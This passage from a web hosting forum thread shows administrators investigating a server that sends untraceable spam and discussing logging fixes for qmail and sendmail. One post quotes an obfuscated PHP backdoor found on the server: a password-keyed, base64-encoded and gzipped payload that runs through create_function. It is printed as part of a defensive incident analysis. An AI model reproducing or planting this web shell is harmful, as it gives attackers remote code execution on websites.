pO8I0OdGyQQM3cYGLAMUDqTUR2mN/Xtb2z8RSYCNC0MUWgdf3W/HdPDRTuyQnd4f+BqKyvQPB6MRuwTAfnZSI0pXry92tFvS74x5nfH21+q8zqjPmfKPE8WhKHf7n9neZ9T3DCwhmwsdz5DbWbjgwYyjyUU8IqynTqjylpR5AHwl98W1ZXwWay31TidF8zJJszisLeWgWOOeWOGcqL1fuKSQYNfEGhHR3BJXEgrdIZFJBfcA0SQChnUNeyIu6VUnp54hLHL2fVVx+SqT8Cty1zHlFjG3mpUOj2/eZSNB6BIuf9SMZXn7uXx/jHGucK6UE6hSDixP869NO9Jlvwf9tsO+7iC6zl8J0gIvwyXcvw/TOMoPxLtGVXxxPKQ+n1LfOM63NB2oxKdn2vs59E3189DxXlVpPCJbmYgZaDw8rKTO8Rz5stSx57Od1A2HK1D3vIY856veyxJ4UUPhxUok8hykhRkywr+vgOkgTeUT5Ba60noZuIKf1d1QGlTjyyoUOlyp7Sm+gvChRIsWRlzowInmnjOah+8aJsWlgZeF39Gkk8L4ixN4o+S5k3Lm01ct1he8cg3PJ1C05oPRl4IOzV9IaBVZLaStsG06hEgKGwV9dY/0gD3rKYB1//Likj6H82y2h8Od6C4JPdpHN0kSxZnCDAHUjWft2Z60sOqqVJgdoNoxe58a2nQMLX3pFo2wTGIu2f+JVB7BJ/9/pMGh/MTffP7kPWNPLvhN39v1/Ad+F1WLLgqACfE3sNeF8LW983hrK7zf2dryHlBU9+iH9uOtrhFcKP0M7xXgTbv1cEQOUYykF5veL95r77+973aT3cKnLqWfCvozvEsIm5k/F9mi9FVFgDgyLfc8A8aMNuae1IOTo3f/PHp35rP/D94cvD7yz90I3bC1+YPhHdlsGKX0PVb62yibQPKCZXMH2tyhArpBZB2906DlgRXvH4b6cw3qVCCfwKVPP3Y9PRUiZ4yO6wwarH7qTwere+LPF4173F7G3suEh2vTLBrxEDSCZfF9p/S81Tcega2saKrsOpWK3cEItm++2ZiyVx+dphx65QwmnVBcjXNzzjffIHX46og++EKNPpU47evrKUelbcfY5wXnCqz19YA/efvL6GNBefjG9hvyx5XB9xw/gLfr84MJe1rmGznA1XV5KIgWfMj7VtWR18Xld6evX+F3F+HQM0pyD0cPW/adoMiHtxfR8P1lDs7PYe+s3/DPwfmA/tL+MWmotwLhHgnODYUKwORizz5DtgbLGoQK6e4poUeVeZ66HFks37G//Hx20Px0/mC33f4LMBLqGX70ziM2wGn3KIQTRCNkOQSvk9/dUOztGQVJWNeyX5XCqGr81If0FRGf/G8XZifEAinTi0ZbfEOttOSQnpAFL0CmpLcHp98dv3n5/eDop9OjN+DCq9cEF3QaUO6JALcBfKIxVmT9Ioit/ql3DJl8wE1zBy75xE0x/77pNTvUUdOnT3kreWrRT12tsxpiyR8LtSyxkCueVqJXCfoNIwAnrKWQtBALdb5rhjpkFxCMDL3KR8QMO3oD8k9w0e6cw+uWrQabPY0WBaS3BFTGNmk3Ww08pcya/QZBR2Sl1eg3Gvh5ziVeItM2TscFVQTIYcl4awe9QaY9TKsfOXU7CBEkomGQJ1EyG5TRZREYVwvPgiuixm7LpEzj26L8CD+HBLgMz37eO7+/17q//6zf7vc7e+2CJ8qUPTVj4uSmhTVuOb5ZbxVBypwBvApffhyMYnZjxitvekdvTgc//Pj96dFJjTPHZyPb+gLOWBT45Ph1ncQfPCjgD3NL3UlfP0/gFXIvgh3KZR5NCGBUkjMkHEdKsiUvPBi8ddAXZI2TO+TPSz4iZ+6ITWWgrQVU5gvToOXfpOKdcN1KBnG9qXpo++rXG98FNomGzYtkehXfPNxS0MNZWQlN4xSGJeGIgicYquC5w7cEHWVDN2gB
« Last Edit: 2014-12-15, 12:47:31 by Spacedust »

Offline MRatWork

  • Administrator
  • The Elite
  • *****
  • Posts: 15,807
  • Karma: +119/-11
  • Gender: Male
    • View Profile
    • MRatWork Forum
Re: My server is sending SPAM but source cannot be tracked !
« Reply #19 on: 2014-12-15, 14:09:48 »
try change 'eval' to 'print("<pre">"); print' and execute with 'lxphp.exe file.php' to know the content.
..:: MRatWork (Mustafa Ramadhan Projects) ::..
-- Server/Web-integrator - Web Hosting (Kloxo-MR READY!) --

Offline Spacedust

  • Super Grand Master
  • ****
  • Posts: 4,050
  • Karma: +1/-0
    • View Profile
Re: My server is sending SPAM but source cannot be tracked !
« Reply #20 on: 2014-12-16, 07:00:45 »
try change 'eval' to 'print("<pre">"); print' and execute with 'lxphp.exe file.php' to know the content.

Got it:

http://pastebin.com/mX6wfUB4

What about this:

Quote
<?php $wp__wp='base'.(32*2).'_de'.'code';$wp__wp=$wp__wp(str_replace("\n", '', 'Ea9EskFq5kqQdI3ShZxXjiTXgocFwxGBFqjWPKKaFAYCVdtMf4GZI1MBfxpqll488V7Tbm3phDbBFAwG
k5MLq6NbLAXb69v3jtw65S0KD5Nx2R8ROgea8Z0z1b/1amqjjy706S1+QQ2+nJYjdf8QYi0ic4kArurt
yE+zVXve7+PByfRZYTFOL7f+0YwcE/+JilFvFyJjOuid8BGS2mlNGOQfnhKnE5hx6rqcKCtrfk29fJNM
s+r1ppMJoVjBbstGuXjMHXYCPlD90sncCTKs/zartN4bBWXeSWp585mZc+OeYVL5mJcPxJn673e62z+y
rROT7OcGEMyd7LCDyMB41OwG6Q5VDAv0wZNelA+Yz0JiYd4nahYoWC/35syZlXQr136ftUc+8gR9xfQW
gG1d2mOxcozGxZbuM9mB80UyYxmXnRDBocwKeR8uTPTiAEXWocDxXLwuCrfhkLZuAvHG2b857X8uqx68
nS8+XSMFquYb6spb8irAgyok1aiuSz3nmyPff5UDylWSWWeTUbLr8xPveohXx7QILM3FCo2edgMoqPO3
5HnO/u84gUkjaqAMe6tTuYCC/j3PJBtTRhJOVu1OdggENrsGE+TQDQD4xMBzQGgQ8spq7eco/eHwA+1u
jxPGRdWIdJm6I+wztPkIqaww4yTTaGVaKSfNmr3IWyieEoTHRQKu4QH6dpA6hFRe3CUQ6h/DVTW/RsCO
z9mftdPzgNEFFCpYtwj5ipGp5Dx1vJ/wiW6gI8sDnu1883J1QX6NAtyZwIQTsfbmEefEljH3OPo0ACDm
jcs/7+lOkA3eU++B36iWChNJl5rsMW9uHVdUUQncubjPMyxgHDN8H3cIFQZm9cKusRdLXHqXVfQQmp5M
Adt741oT7VAGpt3uYbKhwCJOPJI7CXnE/J1HwE7E5j4j5VElqtm691zQFKwb/7lzM0Mb3TjjXp53t7wM
V86KfMxy/JAr99frndIaB+qK3vwI6VzS/N6hvoRYOm5U6UqNbWg9mZgWqQeW4WIi9uNVpqIomUAg3VGm
6FZUaEhcgkyA+XGBu6n95t00TWrZ/LiYfrfvnUcv3KY5zqG2LRzYitWnzV923jubv0eSNWVe97wNCFZj

etc.

and it's ending with:

Quote
'));$wp_wp=isset($_POST['wp_wp'])?$_POST['wp_wp']:(isset($_COOKIE['wp_wp'])?$_COOKIE['wp_wp']:NULL);if($wp_wp!==NULL){$wp_wp=md5($wp_wp).substr(md5(strrev($wp_wp)),0,strlen($wp_wp));for($wp___wp=0;$wp___wp<15185;$wp___wp++){$wp__wp[$wp___wp]=chr(( ord($wp__wp[$wp___wp])-ord($wp_wp[$wp___wp]))%256);$wp_wp.=$wp__wp[$wp___wp];}if($wp__wp=@gzinflate($wp__wp)){if(isset($_POST['wp_wp']))@setcookie('wp_wp', $_POST['wp_wp']);$wp___wp=create_function('',$wp__wp);unset($wp__wp,$wp_wp);$wp___wp();}}?><form action="" method="post"><input type="text" name="wp_wp" value=""/><input type="submit" value="&gt;"/></form>
« Last Edit: 2014-12-16, 07:02:46 by Spacedust »

Offline MRatWork

  • Administrator
  • The Elite
  • *****
  • Posts: 15,807
  • Karma: +119/-11
  • Gender: Male
    • View Profile
    • MRatWork Forum
Re: My server is sending SPAM but source cannot be tracked !
« Reply #21 on: 2014-12-16, 07:15:20 »
It's just convert with 'base64_decode'.

..:: MRatWork (Mustafa Ramadhan Projects) ::..
-- Server/Web-integrator - Web Hosting (Kloxo-MR READY!) --

Offline chrisf

  • Senior Master
  • **
  • Posts: 883
  • Karma: +11/-1
  • Gender: Male
  • Be the change that you wish to see in the world.
    • View Profile
    • Conviction's Hosting
Re: My server is sending SPAM but source cannot be tracked !
« Reply #22 on: 2014-12-17, 22:42:25 »
ah!  The script you decoded checks for qmail and skips our sendmail protection.  (Sendmail limits)  I will have a fix for that over the weekend and I enhanced the code a bit more.

I knew from the start I should have just changed the sendmail in var/qmail!  AHHHH!

Will be fixed!
Christopher

Knowledge in: PHP, Perl, MySQL, Javascript, Actionscript, FLASH, HTML, CSS
Server Administrator / Developer: https://convictionshosting.com

Offline Spacedust

  • Super Grand Master
  • ****
  • Posts: 4,050
  • Karma: +1/-0
    • View Profile
Re: My server is sending SPAM but source cannot be tracked !
« Reply #23 on: 2014-12-18, 05:46:38 »
Thanks chris ! It's really urgent, because we are still sending tons of spam which cannot be tracked !

Mustafa should integrate your script into Kloxo-MR. Last updates required me to reinstall it.

Offline MRatWork

  • Administrator
  • The Elite
  • *****
  • Posts: 15,807
  • Karma: +119/-11
  • Gender: Male
    • View Profile
    • MRatWork Forum
Re: My server is sending SPAM but source cannot be tracked !
« Reply #24 on: 2014-12-18, 05:55:15 »
Latest qmail implementing sendmail-wrapper where every sendmail (usually by php mail() function).

At this moment still little bug but every sendmail will be report in maillog something like:
Code: [Select]
...
Dec 18 05:47:24 oln1 logger: sendmail: CALLER="php-fpm: pool devel " PWD="/home/devel/forum.mratwork.com"
...
..:: MRatWork (Mustafa Ramadhan Projects) ::..
-- Server/Web-integrator - Web Hosting (Kloxo-MR READY!) --

Offline Spacedust

  • Super Grand Master
  • ****
  • Posts: 4,050
  • Karma: +1/-0
    • View Profile
Re: My server is sending SPAM but source cannot be tracked !
« Reply #25 on: 2014-12-18, 06:13:50 »
Latest qmail implementing sendmail-wrapper where every sendmail (usually by php mail() function).

At this moment still little bug but every sendmail will be report in maillog something like:
Code: [Select]
...
Dec 18 05:47:24 oln1 logger: sendmail: CALLER="php-fpm: pool devel " PWD="/home/devel/forum.mratwork.com"
...

Mustafa - you should make additional log file for this - it's very hard to find this around millions of e-mails.

Offline MRatWork

  • Administrator
  • The Elite
  • *****
  • Posts: 15,807
  • Karma: +119/-11
  • Gender: Male
    • View Profile
    • MRatWork Forum
Re: My server is sending SPAM but source cannot be tracked !
« Reply #26 on: 2014-12-18, 06:18:48 »
Try 'cat /var/log/maillog|grep sendmail' in 'Command Center'.
..:: MRatWork (Mustafa Ramadhan Projects) ::..
-- Server/Web-integrator - Web Hosting (Kloxo-MR READY!) --

 


Top 4 Global Search Engines:    Google    Bing    Baidu    Yahoo

Page created in 0.032 seconds with 22 queries.

web stats analysis